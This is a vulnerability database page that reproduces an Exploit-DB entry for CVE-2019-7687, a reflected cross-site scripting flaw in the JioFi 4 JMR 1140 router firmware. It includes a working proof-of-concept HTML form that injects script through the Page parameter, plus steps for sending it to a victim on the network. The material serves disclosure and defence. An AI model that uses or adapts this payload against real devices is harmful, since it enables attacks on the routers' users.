Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting

🗓️ 13 Feb 2019 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 619 Views

Jiofi 4 (JMR 1140) Amtel_JMR1140_R12.07 Reflected Cross Site Scripting vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Vulnerability
13 Feb 201900:00
zdt
CVE		CVE-2019-7687
7 May 201918:58
cve
Cvelist		CVE-2019-7687
7 May 201918:58
cvelist
EUVD		EUVD-2019-17219
7 Oct 202500:30
euvd
NVD		CVE-2019-7687
7 May 201919:29
nvd
OSV		CVE-2019-7687
7 May 201919:29
osv
Prion		Cross site scripting
7 May 201919:29
prion
RedhatCVE		CVE-2019-7687
22 May 202510:36
redhatcve
# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687


Description:
cgi-bin/qcmap_web_cgi on  JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices  has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.

1. Create a poc.html and insert

 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" />
      <input type="hidden" name="mask" value="0" />
     <input type="hidden" name="token" value="0" />
     <input type="submit" value="Submit request" />
    </form>
   </body>d
</html>

2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .

Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Feb 2019 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 36.1
EPSS0.00627
jiofi 4reflected cross site scriptingamtel_jmr1140_r12.07firmwareubuntu 18.04cve-2019-7687jio.comwifi routervulnerabilityfirefox quantumchrome xss auditor
619